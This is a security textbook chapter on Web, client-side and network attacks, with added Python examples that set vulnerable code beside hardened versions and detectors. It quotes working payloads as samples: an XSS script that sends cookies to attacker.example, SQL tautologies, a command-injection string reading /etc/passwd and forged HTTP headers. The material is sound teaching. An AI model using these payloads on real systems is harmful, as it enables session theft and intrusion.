Security+ Guide to Network Security Fundamentals, Fourth Edition
Chapter 3: Application and Network Attacks

Objectives
• List and explain the different types of Web application attacks
• Define client-side attacks
• Explain how a buffer overflow attack works
• List different types of denial of service attacks
• Describe interception and poisoning attacks

Application Attacks
• Attacks that target applications
  – Category continues to grow
  – Web application attacks
  – Client-side attacks
  – Buffer overflow attacks
• Zero-day attacks
  – Exploit previously unknown vulnerabilities, for which no patch or signature yet exists
  – Victims have no time to prepare or defend

Web Application Attacks
• Web applications are an essential element of organizations today
• Traditional approach to securing Web applications
  – Hardening the Web server
  – Protecting the network
  – Neither step inspects the input that the application itself accepts, which is where the attacks below arrive

Figure 3-1 Web application infrastructure © Cengage Learning 2012

Web Application Attacks (cont'd.)
• Common Web application attacks
  – Cross-site scripting (XSS)
  – SQL injection
  – XML injection
  – Command injection / directory traversal

Figure 3-2 Web application security © Cengage Learning 2012

Cross-Site Scripting (XSS)
• Injecting scripts into a Web application so that the server delivers them to its users
  – The server is only the vehicle; the attack is directed at the clients
Figure 3-3 XSS attacks © Cengage Learning 2012

Cross-Site Scripting (cont'd.)
• When the victim visits the injected Web site:
  – Malicious instructions are sent to the victim's browser
  – Browser cannot distinguish between the site's valid code and the injected script, so the script runs with the site's own privileges
• Requirements of the targeted Web site
  – Accepts user input without validation
  – Uses that input in a response without encoding it
• Some XSS attacks are designed to steal information retained by the browser, such as session cookies
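The two preconditions above (input accepted without validation, then echoed without encoding) are easiest to see side by side. The following is an added example, not code from the textbook: a bookmark page of the kind in Figure 3-4, first echoing the submitted title raw and then encoding it for the HTML context it lands in. The payload string, the `attacker.example` host and the function names are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: what an attacker types into the bookmark form. If echoed raw,
# the browser runs it and ships the victim's cookies to the attacker's host.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def render_bookmark_unsafe(title: str) -> str:
    """Vulnerable: the submitted title is echoed into the page exactly as received."""
    return f"<p>Bookmark saved: {title}</p>"


def render_bookmark_safe(title: str) -> str:
    """Hardened: HTML-encode the value for the element-content context before echoing it.
    '<' becomes '&lt;', so the browser shows the text instead of executing it."""
    return f"<p>Bookmark saved: {html.escape(title, quote=True)}</p>"


def safe_href(url: str):
    """Attribute context needs more than encoding: html.escape() passes
    'javascript:alert(1)' through untouched, so the URL scheme is allow-listed first.
    Returns the encoded URL, or None when it must not be placed in an href."""
    cleaned = url.strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ("http", "https"):     # also rejects data:, vbscript:, and schemeless input
        return None
    return html.escape(cleaned, quote=True)


def reflects_raw_script(page: str) -> bool:
    """Crude probe a tester runs against a response: did a raw <script> tag survive?"""
    return "<script" in page.lower()
```

Encoding is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a URL attribute also needs the scheme check shown in `safe_href`, and a value dropped inside a `<script>` block needs JavaScript-string encoding instead.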

Figure 3-4 Bookmark page that accepts user input without validating and provides an unencoded response © Cengage Learning 2012

Figure 3-5 Input used as response © Cengage Learning 2012

SQL Injection
• Targets SQL servers by injecting SQL commands through application input fields
• SQL (Structured Query Language)
  – Used to manipulate data stored in a relational database
• Forgotten password example
  – Attacker enters an incorrectly formatted e-mail address
  – Response (a database error versus a generic "not found" message) lets the attacker know whether the input is being validated

SQL Injection (cont'd.)
• Forgotten password example (cont'd.)
  – Attacker enters an SQL fragment in the e-mail field
  – Application splices it into its statement, which the database then processes
  – Example statement: SELECT fieldlist FROM table WHERE field = 'whatever' or 'a'='a'
  – Result: 'a'='a' is always true, so every row matches and all user e-mail addresses are displayed
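The forgotten-password example runs end to end below. This is an added example, not code from the textbook: an in-memory SQLite table stands in for the user database, and the constructed names (`USERS`, `lookup_unsafe`, `lookup_safe`, `quote_probe_errors`) are assumptions for illustration. The injected value is the slide's own `whatever' or 'a'='a`.

```python
import sqlite3

# Constructed sample data behind the "forgotten password" form.
USERS = [("alice@example.com", "alice"), ("bob@example.com", "bob")]

# The slide's injection string: closes the quoted value and appends an always-true clause.
INJECTION = "whatever' or 'a'='a"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, email: str) -> list:
    """Vulnerable: the submitted address is spliced into the SQL text. With INJECTION the
    statement becomes  SELECT email FROM users WHERE email = 'whatever' or 'a'='a'
    which matches every row."""
    sql = f"SELECT email FROM users WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    """Hardened: the address is bound as a parameter, so the database treats it as a value
    to compare and never as SQL. The quote characters lose all meaning."""
    sql = "SELECT email FROM users WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email,))]


def quote_probe_errors(conn: sqlite3.Connection, lookup) -> bool:
    """The reconnaissance step from the slide: submit a malformed value (a lone quote) and
    see whether a database error comes back. True means the input reached the SQL parser
    unvalidated; the parameterized query simply finds no match."""
    try:
        lookup(conn, "'")
    except sqlite3.Error:
        return True
    return False


def run_demo() -> dict:
    """Exercise both lookups against the same data and report what each one leaked."""
    conn = make_db()
    return {
        "honest_unsafe": lookup_unsafe(conn, "alice@example.com"),
        "injected_unsafe": lookup_unsafe(conn, INJECTION),
        "injected_safe": lookup_safe(conn, INJECTION),
        "honest_safe": lookup_safe(conn, "bob@example.com"),
        "probe_unsafe_errors": quote_probe_errors(conn, lookup_unsafe),
        "probe_safe_errors": quote_probe_errors(conn, lookup_safe),
    }
```

The fix is the placeholder `?`: the value travels to the database separately from the statement text, so no amount of quoting in the input can change the query's structure. Input validation (rejecting addresses that do not look like e-mail) is worth adding as well, but it is defense in depth, not the primary control.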

SQL Injection (cont'd.)
Table 3-1 SQL injection statements
• See link Ch 3f

XML Injection
• Markup language
  – Method for adding annotations to text
• HTML
  – Uses tags surrounded by angle brackets
  – Instructs the browser to display text in a specific format
• XML
  – Carries data instead of indicating how to display it
  – No predefined set of tags; users define their own tags

XML Injection (cont'd.)
• XML injection attack
  – Similar to an SQL injection attack
  – Attacker discovers a Web site that does not filter user data
  – Injects XML tags and data into the XML document or XML-backed database the application uses
• XPath injection
  – Specific type of XML injection attack
  – Attempts to exploit XML Path Language (XPath) queries, the XML equivalent of SQL queries

Command Injection / Directory Traversal
• Web server users are normally confined to the Web root directory
• Users may be able to access subdirectories
  – But not parallel or higher-level directories
• Sensitive files to protect from unauthorized user access
  – cmd.exe (Windows) can be used to enter text-based commands
  – /etc/passwd (Linux) contains user account information

Command Injection / Directory Traversal (cont'd.)
• Directory traversal attack
  – Takes advantage of a software vulnerability: path input such as ../ sequences is used without validation
  – Attacker moves from the Web root directory into restricted directories
• Command injection attack
  – Attacker enters operating system commands in an input field, and the server executes them
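Both attacks on this slide come down to user input reaching a path or a command line unchecked. The following is an added example, not code from the textbook, showing the server-side checks that stop them: a path resolver that refuses anything escaping the document root (including URL-encoded and backslash variants), and a command builder that validates a hostname and passes it as a separate argument instead of through a shell. `/var/www/html` and the function names are assumed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root (hypothetical path)

# One or more DNS labels: letters, digits, inner hyphens. A host cannot start with '-',
# so it can never be mistaken for a command-line option either.
HOSTNAME = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def resolve_under_root(url_path: str, root: str = WEB_ROOT):
    """Map a requested URL path onto the filesystem; None means the request is rejected.
    Uses a purely lexical check so it behaves the same on any platform; on a real server
    follow it with os.path.realpath() so symlinks cannot lead back out of the root."""
    decoded = unquote(url_path)
    if "\x00" in decoded or "%" in decoded:
        return None                     # null-byte truncation or a second layer of URL encoding
    decoded = decoded.replace("\\", "/")        # treat backslashes as separators too
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if joined != root and not joined.startswith(root + "/"):
        return None                     # ../ sequences walked above the document root
    return joined


def build_ping_command(host: str):
    """Command injection guard. The vulnerable form would be
        os.system(f"ping -c 1 {host}")
    where host = "8.8.8.8; cat /etc/passwd" runs a second command. Here the host must
    match HOSTNAME and is returned as its own argv element for subprocess.run(),
    so no shell ever parses it. Returns the argv list, or None when rejected."""
    if not HOSTNAME.match(host):
        return None
    return ["ping", "-c", "1", host]
```

The traversal check compares against `root + "/"` rather than `root` alone, so a sibling directory such as `/var/www/html2` cannot slip past a prefix match.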

Client-Side Attacks
• Web application attacks are server-side attacks
• Client-side attacks target vulnerabilities in client applications
  – The client interacts with a compromised server
  – The client initiates the connection with the server, and the server's response attacks the client

Client-Side Attacks (cont'd.)
• Drive-by download
  – Client computer is compromised simply by viewing a Web page
  – Attackers inject content into a vulnerable Web server
    • Gain access to the server's operating system
  – Attackers craft a zero-pixel frame to avoid visual detection
    • Embed an HTML document inside the main document
  – Client's browser downloads the malicious script
    • Instructs the computer to download malware

Client-Side Attacks (cont'd.)
• Header manipulation
  – HTTP headers contain fields that characterize the data being transmitted
  – Request headers originate from the Web browser
    • Browsers do not normally let the user or page script alter them
    • A short program written by the attacker can send any header value it likes
• Examples of header manipulation
  – Referer
  – Accept-Language

Client-Side Attacks (cont'd.)
• Referer field indicates the page from which the request was generated
  – Attacker can set this field to hide the fact that a request came from another site
  – The modified Web page is hosted from the attacker's computer
• Accept-Language
  – Some Web applications pass the contents of this field directly to the database
  – Attacker could inject an SQL command by modifying this header
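The point of the two header slides is that every request header is client-controlled. The following is an added example, not code from the textbook: the attacker side assembles a raw HTTP request with a forged Referer and an SQL fragment in Accept-Language, and the server side shows a Referer check being fooled and an Accept-Language parser that only lets a well-formed, supported language tag through. The host `shop.example`, the header values and the function names are constructed for illustration.

```python
import re

# Constructed: the headers an attacker's script sends. A browser fills in Referer and
# Accept-Language itself and will not let page script override them; a program has no limit.
FORGED_HEADERS = {
    "Host": "shop.example",
    "Referer": "https://shop.example/checkout",   # claims the request came from the site itself
    "Accept-Language": "en' OR 'a'='a",            # SQL fragment aimed at an unfiltered query
}


def build_request(method: str, path: str, headers: dict) -> bytes:
    """Attacker side: assemble a raw HTTP/1.1 request with arbitrary header values."""
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("iso-8859-1")


def parse_headers(raw: bytes) -> dict:
    """Server side: split the head of the request into lower-cased header names."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    _request_line, *header_lines = head.split("\r\n")
    return {k.strip().lower(): v.strip() for k, v in (h.split(":", 1) for h in header_lines)}


def referer_allows(headers: dict, site: str) -> bool:
    """A Referer-based check of the kind the slide warns about. It passes for the forged
    request because the client chose the value, so it must never act as authorization."""
    return headers.get("referer", "").startswith(f"https://{site}/")


LANG_TAG = re.compile(r"^[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*$")   # RFC 5646-style tag shape


def pick_language(accept_language: str, supported=("en", "fr", "de")):
    """Treat Accept-Language as untrusted input. Only a well-formed tag whose primary
    subtag is in the supported set is returned, so an SQL fragment in the header can
    never reach a query. Returns the primary tag, or None if nothing acceptable."""
    for item in accept_language.split(","):
        tag = item.split(";", 1)[0].strip()      # drop any ;q=0.8 weight
        if LANG_TAG.match(tag) and tag.split("-")[0].lower() in supported:
            return tag.split("-")[0].lower()
    return None


def forged_request_outcome() -> dict:
    """Send the forged request through both server-side checks."""
    headers = parse_headers(build_request("GET", "/account", FORGED_HEADERS))
    return {
        "referer": headers["referer"],
        "referer_check_passed": referer_allows(headers, "shop.example"),
        "language": pick_language(headers["accept-language"]),
    }
```

Even when the language value is validated, the query that uses it should still be parameterized; the allow-list here limits what the application accepts, and the bound parameter limits what the database will interpret.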

Client-Side Attacks (cont'd.)
• Cookies and attachments
  – Cookies store user-specific information on the user's local computer
    • Web sites use cookies to identify repeat visitors
  – Examples of information stored in a cookie
    • Travel Web sites may store the user's travel itinerary
    • Personal information provided when visiting a site
  – Only the Web site that created a cookie can read it: the browser returns a cookie only to the site that set it

Client-Side Attacks (cont'd.)
• First-party cookie
  – Cookie created by the Web site the user is currently visiting
• Third-party cookie
  – Site advertisers place a cookie to record user preferences
• Session cookie
  – Stored in RAM and expires when the browser is closed

Client-Side Attacks (cont'd.)
• Persistent cookie
  – Recorded on the computer's hard drive
  – Does not expire when the browser closes
• Secure cookie
  – Sent by the browser only over an encrypted (HTTPS) connection
  – The cookie's contents are not themselves encrypted; the Secure attribute only prevents it from being sent in the clear, where it could be sniffed

Client-Side Attacks (cont'd.)
• Flash cookie
  – Uses more memory than a traditional cookie
  – Cannot be deleted through browser configuration settings
  – See Project 3-6 to change Flash cookie settings
• Cookies pose security and privacy risks
  – May be stolen and used to impersonate the user
  – Used to tailor advertising
  – Can be exploited by attackers

Client-Side Attacks (cont'd.)
• Session hijacking
  – Attacker impersonates a user by stealing or guessing the user's session token
• Malicious add-ons
  – Browser extensions provide multimedia or interactive Web content
  – ActiveX add-ons have several security concerns
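Session hijacking and the cookie attributes on the preceding slides meet in the session cookie: the token has to be unguessable, and the cookie carrying it has to be protected from sniffing and from theft by script. The following is an added example, not code from the textbook. It contrasts a guessable sequential token with one drawn from the OS random generator, builds a Set-Cookie header with the Secure, HttpOnly and SameSite attributes, and keeps a small server-side session table. `SESSIONID`, `SessionStore` and the other names are assumptions for illustration.

```python
import secrets
from http.cookies import SimpleCookie


def weak_token(counter: int) -> str:
    """A guessable token: a zero-padded sequence number. Capturing any two of them is
    enough to predict the next one, which is the "guessing" route to hijacking."""
    return f"{counter:08d}"


def predict_next_weak(observed: list) -> str:
    """What an attacker does with captured weak tokens."""
    return weak_token(int(observed[-1]) + 1)


def strong_token() -> str:
    """256 bits from the OS CSPRNG: infeasible to guess and unrelated to earlier tokens."""
    return secrets.token_urlsafe(32)


def session_set_cookie(token: str) -> str:
    """Set-Cookie header for the session cookie with the protective attributes:
    Secure (sent only over TLS, so it cannot be sniffed in the clear), HttpOnly
    (invisible to page script, so an XSS payload cannot export it) and SameSite=Strict
    (not attached to cross-site requests)."""
    jar = SimpleCookie()
    jar["SESSIONID"] = token
    jar["SESSIONID"]["secure"] = True
    jar["SESSIONID"]["httponly"] = True
    jar["SESSIONID"]["samesite"] = "Strict"
    jar["SESSIONID"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


class SessionStore:
    """Server-side table of live sessions. Presenting the token is the only proof of
    identity, which is exactly why it must be unguessable and must not leak."""

    def __init__(self):
        self._sessions = {}

    def issue(self, username: str) -> str:
        token = strong_token()
        self._sessions[token] = username
        return token

    def user_for(self, presented: str):
        """Constant-time comparison against every live token (a real store would index
        by a hash of the token; the linear scan keeps the example short)."""
        if not presented.isascii():
            return None
        for token, user in self._sessions.items():
            if secrets.compare_digest(token, presented):
                return user
        return None

    def revoke(self, token: str) -> None:
        self._sessions.pop(token, None)
```

Issuing a fresh token at login (and revoking the old one) also closes the session-fixation variant, where the attacker plants a token of their own choosing before the victim authenticates.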

Figure 3-7 Session hijacking © Cengage Learning 2012

Client-Side Attacks (cont'd.)
• Buffer overflow attacks
  – Process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer
  – Data overflows into adjacent memory locations
  – May cause the computer to stop functioning
  – Attacker can overwrite the saved "return address" stored next to the buffer
    • Redirects execution to a memory address containing the attacker's code

Figure 3-8 Buffer overflow attack © Cengage Learning 2012

Network Attacks
• Denial of service (DoS)
  – Attempts to prevent a system from performing its normal functions
  – Ping flood attack
    • Ping utility used to send a large number of ICMP echo request messages
    • Overwhelms the target, such as a Web server
  – Smurf attack
    • Ping request sent to a network's broadcast address with its originating (source) address spoofed to the target's address
    • Appears as if the target computer is asking for a response from all computers on the network, which then flood it with replies

Network Attacks (cont'd.)
• Denial of service (DoS) (cont'd.)
  – SYN flood attack
    • Takes advantage of the procedure for establishing a TCP connection (the three-way handshake)
    • Attacker sends many SYN segments, often from spoofed addresses, and never completes the handshake; the half-open connections exhaust the target's resources
• Distributed denial of service (DDoS)
  – Attacker uses many zombie computers in a botnet to flood a device with requests
  – Very difficult to identify and block the sources of the attack
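A SYN flood leaves a measurable trace: SYNs that are never followed by the client's handshake ACK. The following is an added example, not code from the textbook, of detection logic run over a constructed list of packet records; it shows why a per-source threshold alone misses a flood from spoofed addresses, each of which contributes only one half-open connection. The record format, the `198.51.100.x` source addresses and the thresholds are assumptions for illustration.

```python
from collections import Counter

# Constructed packet records: (timestamp, src_ip, flags) for segments arriving at a
# server's listening port. "S" is a client SYN, "A" the client's final ACK of the handshake.
NORMAL = [(t, "10.0.0.5", f) for t in range(3) for f in ("S", "A")]       # three clean handshakes
FLOOD = [(10 + i * 0.01, f"198.51.100.{i}", "S") for i in range(1, 31)]  # spoofed sources, no ACKs


def half_open_counts(packets) -> Counter:
    """Per source, count SYNs that were never followed by that source's handshake ACK."""
    pending = Counter()
    for _ts, src, flags in packets:
        if flags == "S":
            pending[src] += 1
        elif flags == "A" and pending[src] > 0:
            pending[src] -= 1
    return +pending       # unary plus drops sources that completed all their handshakes


def detect_syn_flood(packets, per_source=10, total=20) -> dict:
    """Two views of the same data: a per-source threshold catches one noisy client, while
    the aggregate half-open count is the signal for a flood spread across many
    (spoofed) addresses."""
    pending = half_open_counts(packets)
    return {
        "total_half_open": sum(pending.values()),
        "noisy_sources": sorted(s for s, n in pending.items() if n >= per_source),
        "flood": sum(pending.values()) >= total,
    }
```

On a real host the equivalent figure is the number of sockets in SYN_RECV; the usual mitigations (SYN cookies, shorter handshake timeouts, backlog limits) all work by refusing to hold state for a SYN until the peer proves it can complete the handshake.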

Figure 3-9 SYN flood attack © Cengage Learning 2012

Interception
• Man-in-the-middle
  – Interception of legitimate communication
  – Forging a fictitious response to the sender
  – Passive attack records the transmitted data
  – Active attack alters the contents of the transmission before sending it to the recipient
• Replay attacks
  – Similar to a passive man-in-the-middle attack

Interception (cont'd.)
• Replay attacks (cont'd.)
  – Attacker makes a copy of a transmission
    • Uses the copy at a later time
  – Example: capturing logon credentials and resubmitting them
• More sophisticated replay attacks
  – Attacker captures a network device's message to a server
  – Later sends the original, valid message to the server
  – Establishes a trust relationship between the attacker and the server
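What makes the captured message "valid" in the replay scenarios above is that nothing ties it to one moment or one use. The following is an added example, not code from the textbook, of the standard countermeasure: each message carries a nonce and a timestamp under an HMAC, and the receiver rejects tampered messages, messages outside a freshness window, and any nonce it has already accepted. The shared key, message format and class names are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
import time

KEY = b"shared-secret-for-demo"   # constructed; a real system provisions keys out of band


def _payload(nonce: str, ts: int, body: str) -> bytes:
    return f"{nonce}|{ts}|{body}".encode()


def make_message(key: bytes, body: str, now=None, nonce=None) -> dict:
    """Sender: bind the body to a fresh nonce and the current time, then authenticate
    all three with an HMAC so none of them can be altered after capture."""
    nonce = nonce or secrets.token_hex(16)
    ts = int(now if now is not None else time.time())
    tag = hmac.new(key, _payload(nonce, ts, body), hashlib.sha256).hexdigest()
    return {"nonce": nonce, "ts": ts, "body": body, "tag": tag}


class ReplayGuard:
    """Receiver: verifies the MAC first, then freshness, then nonce uniqueness.
    Returns one of "ok", "bad_mac", "stale", "replay"."""

    def __init__(self, key: bytes, window: int = 30):
        self.key, self.window, self.seen = key, window, {}

    def accept(self, msg: dict, now=None) -> str:
        now = now if now is not None else time.time()
        expected = hmac.new(self.key, _payload(msg["nonce"], msg["ts"], msg["body"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, msg["tag"]):
            return "bad_mac"                      # altered body, nonce or timestamp
        if abs(now - msg["ts"]) > self.window:
            return "stale"                        # a copy presented long after capture
        if msg["nonce"] in self.seen:
            return "replay"                       # the same valid message a second time
        self.seen[msg["nonce"]] = msg["ts"]
        # Nonces older than the window can be forgotten: the timestamp check rejects them.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        return "ok"
```

The timestamp bounds how long the nonce table must be kept, and the nonce stops replays inside that window; neither check alone is enough, and both depend on the MAC covering them.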

Poisoning
• ARP poisoning
  – Attacker sends forged ARP replies so that the MAC address stored in a victim's ARP cache for a given IP address points to a different computer, typically the attacker's
Table 3-3 ARP poisoning attack

Poisoning (cont'd.)
Table 3-4 Attacks from ARP poisoning
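ARP has no authentication, so the only detective control is watching the IP-to-MAC mappings for changes. The following is an added example, not code from the textbook, that runs that check over a constructed sequence of ARP replies in which an attacker claims both the gateway's and a victim's IP address; it raises one alert when a mapping changes and another when one MAC address ends up owning several IP addresses. The addresses and function names are assumptions for illustration.

```python
from collections import defaultdict

# Constructed ARP replies seen on the segment: (timestamp, sender_ip, sender_mac)
SAMPLE_ARP = [
    (0.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # gateway, legitimate
    (1.0, "192.168.1.20", "aa:bb:cc:00:00:20"),   # victim workstation, legitimate
    (2.0, "192.168.1.1",  "DE:AD:BE:EF:00:99"),   # attacker claims to be the gateway
    (2.1, "192.168.1.20", "de:ad:be:ef:00:99"),   # and the victim: the Table 3-4 MITM setup
]


def detect_arp_spoofing(replies):
    """Replay the ARP replies into a cache and return (final_table, alerts)."""
    table, alerts = {}, []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = table.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"kind": "mac_changed", "ts": ts, "ip": ip,
                           "old": previous, "new": mac})
        table[ip] = mac
    # A single MAC answering for several IPs is the signature of a poisoning MITM.
    ips_by_mac = defaultdict(set)
    for ip, mac in table.items():
        ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append({"kind": "one_mac_many_ips", "mac": mac, "ips": sorted(ips)})
    return table, alerts
```

The preventive counterpart is a static ARP entry for the gateway on critical hosts, or dynamic ARP inspection on managed switches, which drops replies that contradict the DHCP binding table.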

Poisoning (cont'd.)
• DNS poisoning
  – Domain Name System is the current basis for resolving names to IP addresses
  – DNS poisoning substitutes a false IP address for a name, redirecting the computer to another device
• Two locations for DNS poisoning
  – Local host table (the hosts file), which is consulted before DNS
  – External DNS server
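The local host table is the cheaper of the two targets: a single line in the hosts file overrides DNS for that name. The following is an added example, not code from the textbook, that parses a constructed hosts file and flags any entry that sends a watched domain somewhere other than loopback. The domains and addresses in the sample are constructed for illustration.

```python
import ipaddress

# Constructed hosts file: the third entry is the kind an attacker plants.
SAMPLE_HOSTS = """\
# constructed sample
127.0.0.1   localhost
::1         localhost ip6-localhost
192.0.2.77  www.bank.example bank.example   # redirects the bank to an attacker-controlled host
127.0.0.1   ads.tracker.example             # sinkholing an ad server is benign
not-an-ip   broken.example
"""


def parse_hosts(text: str):
    """Yield (ip, [names]) for each entry, ignoring comments, blanks and unparsable lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue                      # malformed address; the resolver ignores it too
        yield ip, [n.lower() for n in names]


def suspicious_hosts_entries(text: str, watched=("bank.example",)):
    """Entries that resolve a watched domain (or a subdomain of it) to a non-loopback
    address. Loopback entries are the usual ad-blocking pattern and are left alone."""
    hits = []
    for ip, names in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        for name in names:
            if addr.is_loopback:
                continue
            if any(name == w or name.endswith("." + w) for w in watched):
                hits.append((name, ip))
    return hits
```

On Linux the file is /etc/hosts and on Windows %SystemRoot%\System32\drivers\etc\hosts; the same check applied to the external-server case means comparing answers from an independent resolver, which this offline example does not attempt.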

Figure 3-12 DNS poisoning © Cengage Learning 2012

Attacks on Access Rights
• Privilege escalation
  – Exploiting a software vulnerability to gain access to restricted data or functions
  – Vertical: a lower-privilege user accesses functions restricted to higher-privilege users
  – Horizontal: a user with restricted privilege accesses the different restricted privileges of a similar user (for example, another customer's records)
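In Web applications both forms of escalation usually come from a missing or misplaced authorization check rather than a memory-corruption bug. The following is an added example, not code from the textbook: a document lookup that forgets to bind the record to its owner (horizontal escalation) and an admin check that trusts a role value supplied by the client (vertical escalation), each beside its corrected form. The `User` class, the document table and the function names are assumptions for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str          # "user" or "admin", established server-side at login


# Constructed documents: id -> (owner, contents)
DOCS = {1: ("alice", "alice's tax return"), 2: ("bob", "bob's notes")}


def fetch_document_unsafe(user: User, doc_id: int) -> str:
    """Horizontal escalation: the only check is that someone is logged in, so bob reads
    alice's document by changing the id in the request."""
    return DOCS[doc_id][1]


def fetch_document_safe(user: User, doc_id: int):
    """Bind the object to the requester: owner or admin only. None means denied."""
    owner, body = DOCS[doc_id]
    if user.name != owner and user.role != "admin":
        return None
    return body


def admin_panel_unsafe(session_user: User, request_params: dict) -> bool:
    """Vertical escalation: the role is read from a client-supplied field (hidden form
    field, cookie or query string), so any user can submit role=admin."""
    return request_params.get("role") == "admin"


def admin_panel_safe(session_user: User, request_params: dict) -> bool:
    """Authority comes only from the server-side session, never from the request."""
    return session_user.role == "admin"
```

The pattern generalizes: every request that names an object must be checked against the caller's identity on the server, and every attribute that grants privilege must be looked up server-side rather than read back from the client.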

Attacks on Access Rights (cont'd.)
• Transitive access
  – Attack that involves a third party to gain access rights
  – Has to do with whose credentials should be used when accessing services
    • Different users have different access rights